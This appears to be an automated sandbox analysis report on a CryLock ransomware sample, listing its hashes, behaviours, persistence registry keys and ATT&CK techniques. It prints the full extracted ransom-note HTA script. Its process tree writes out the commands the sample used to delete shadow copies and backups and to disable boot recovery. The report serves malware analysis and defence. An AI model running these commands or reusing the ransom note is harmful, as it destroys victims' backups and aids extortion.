Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-10-2024 10:04
Behavioral task
behavioral1
Sample
2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
-
Size
206KB
-
MD5
2f2d4eb24662c916f822f9c3fd55c9b2
-
SHA1
9d5bda347f70b8f928803a28782a1018d9f2d0e0
-
SHA256
4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
-
SHA512
1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
-
SSDEEP
3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC
Malware Config
Extracted
crylock
- emails
-
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if 
(timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. 
Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+' '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } 
function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. 
</div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. 
If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! 
<div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>
Extracted
C:\$Recycle.Bin\S-1-5-21-3756129449-3121373848-4276368241-1000\how_to_decrypt.hta
Signatures
-
Crylock
Ransomware family that is a new variant of Cryakl ransomware.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely used for geofencing.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 1 IoCs
description ioc Process File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\how_to_decrypt.hta 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E903D8D9-D590400F = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe\" -id \"E903D8D9-D590400F\" -wid \"vis\"" 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\633863 = "633863" 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 30 IoCs
description ioc Process File opened for modification \??\c:\users\admin\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\documents\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\f:\$recycle.bin\s-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\searches\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\libraries\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\3d objects\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\documents\desktop.ini 
2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\onedrive\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\camera roll\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\$recycle.bin\s-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\saved pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\public\accountpictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1740 WMIC.exe Token: SeSecurityPrivilege 1740 WMIC.exe Token: SeTakeOwnershipPrivilege 1740 WMIC.exe Token: SeLoadDriverPrivilege 1740 WMIC.exe Token: SeSystemProfilePrivilege 1740 WMIC.exe Token: SeSystemtimePrivilege 1740 WMIC.exe Token: SeProfSingleProcessPrivilege 1740 WMIC.exe Token: SeIncBasePriorityPrivilege 1740 WMIC.exe Token: SeCreatePagefilePrivilege 1740 WMIC.exe Token: SeBackupPrivilege 1740 WMIC.exe Token: SeRestorePrivilege 1740 WMIC.exe Token: SeShutdownPrivilege 1740 WMIC.exe Token: SeDebugPrivilege 1740 WMIC.exe Token: SeSystemEnvironmentPrivilege 1740 WMIC.exe Token: SeRemoteShutdownPrivilege 1740 WMIC.exe Token: SeUndockPrivilege 1740 WMIC.exe Token: SeManageVolumePrivilege 1740 WMIC.exe Token: 33 1740 WMIC.exe Token: 34 1740 WMIC.exe Token: 35 1740 WMIC.exe Token: 36 1740 WMIC.exe Token: SeIncreaseQuotaPrivilege 1740 WMIC.exe Token: SeSecurityPrivilege 1740 WMIC.exe Token: SeTakeOwnershipPrivilege 1740 WMIC.exe Token: SeLoadDriverPrivilege 1740 WMIC.exe Token: SeSystemProfilePrivilege 1740 WMIC.exe Token: SeSystemtimePrivilege 1740 WMIC.exe Token: SeProfSingleProcessPrivilege 1740 WMIC.exe Token: SeIncBasePriorityPrivilege 1740 WMIC.exe Token: SeCreatePagefilePrivilege 1740 WMIC.exe Token: SeBackupPrivilege 1740 WMIC.exe Token: SeRestorePrivilege 1740 WMIC.exe Token: SeShutdownPrivilege 1740 WMIC.exe Token: SeDebugPrivilege 1740 WMIC.exe Token: SeSystemEnvironmentPrivilege 1740 WMIC.exe Token: SeRemoteShutdownPrivilege 1740 WMIC.exe Token: SeUndockPrivilege 1740 WMIC.exe Token: SeManageVolumePrivilege 1740 WMIC.exe Token: 33 1740 WMIC.exe Token: 34 1740 WMIC.exe Token: 35 1740 WMIC.exe Token: 36 1740 WMIC.exe Token: SeBackupPrivilege 436 vssvc.exe Token: SeRestorePrivilege 436 vssvc.exe Token: SeAuditPrivilege 436 vssvc.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2660 wrote to memory of 1096 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 86 PID 2660 wrote to memory of 1096 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 86 PID 2660 wrote to memory of 1096 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 86 PID 2660 wrote to memory of 5116 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 88 PID 2660 wrote to memory of 5116 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 88 PID 2660 wrote to memory of 5116 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 88 PID 2660 wrote to memory of 2900 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 90 PID 2660 wrote to memory of 2900 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 90 PID 2660 wrote to memory of 2900 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 90 PID 2660 wrote to memory of 864 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 92 PID 2660 wrote to memory of 864 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 92 PID 2660 wrote to memory of 864 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 92 PID 2660 wrote to memory of 1228 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 94 PID 2660 wrote to memory of 1228 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 94 PID 2660 wrote to memory of 1228 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 94 PID 2660 wrote to memory of 4084 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 96 PID 2660 wrote to memory of 4084 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 96 PID 2660 wrote to memory of 4084 2660 2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe 96 PID 864 wrote to memory of 1740 864 cmd.exe 98 PID 864 wrote to memory of 1740 864 cmd.exe 98 PID 864 wrote to memory of 1740 864 cmd.exe 98 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"2⤵
- System Location Discovery: System Language Discovery
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"2⤵
- System Location Discovery: System Language Discovery
PID:5116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"2⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"2⤵
- System Location Discovery: System Language Discovery
PID:1228
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"2⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:436
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1
Downloads
-
Filesize
930B
MD5037bde8503b7c50bbe61f66d9606dc96
SHA162a27b7e2fa9c59f971a05aa3ccccf12587f84a0
SHA2569e9ac2f311c6997e18f6632d0426cd0abaabe2c5c78ac20b0d97f09a7f383907
SHA512cee08aa4b0e2f74da4ae3aa419474694ac751d986f61f791fc8fc3f9c36c0fb5b766a624a5ed1b4e383f2e3e3190acc33d4c8c7846faf794124894438621ee2d
-
Filesize
930B
MD560b24c3d605579cf8d74a971616ce5ae
SHA10d1ed44a7abe1b542da7cdf84d8c92002515ae7f
SHA256a4b80692a0aa04dbb38c1400f3126d2abc31b42ca52ea447b5e99b9c7514c178
SHA5123c92ad3d7c43d3291c5e5f767c1830d13ce857599ed009333ba0e7b0ad8d55e3cd5af14af6924560dc8cb7785149c2546fe4605fdc6cc4f97e26eb4bbcb6f64c
-
Filesize
13KB
MD5445a690e398a932f4f19f69aa6124e42
SHA15a2c3c974ca6a493343c7671dd0fb88ca1a660c8
SHA256a6f3076e747b5fecec0333343727f90f18b935b1490a3762343e894843defedf
SHA51287451f0b2c0d6cd3b422685be17ccd477556f70e02b6dac8138e409ba77ea7981f8f6198deda31e92ba65fae8ffbb01e4aa21c21b8632c59c91cc18cf0cf6ce0
-
Filesize
1KB
MD51952fcae56d7c1ab501a8b46d54aad61
SHA1874a08112af7b5ac89cb3c4c07ee116d460f592a
SHA256f7dc958d9cc4b24f805651470d142cbbbde192baed19cbe5e360b33ec90bf876
SHA51250afb0374ea784860704c9e32f39541cf10f20ae8a0333eb28a4d4dcbd637f086aba59ba96eee0506cfe5f1eca1f0c250bfad5a70d2616375acb8384c4f50d66
-
Filesize
4KB
MD55e6e6ca394fcae71f3440dda3df3b1b1
SHA1d8cd1f29a6b824da9afc072d3c337e9befa2e617
SHA2563b0ded10caafe51194b218dafd90d4894c44d47e9eab137c8c1c1e4f7a95895b
SHA51218aa1ea847ca271a8e6dc7e940b3721b9236c06159932bb675a90586afd3eb73d69a56071d4b45fba5f2d9ce35b760ce1dd848cee6ba1a8b6d8ea93534871694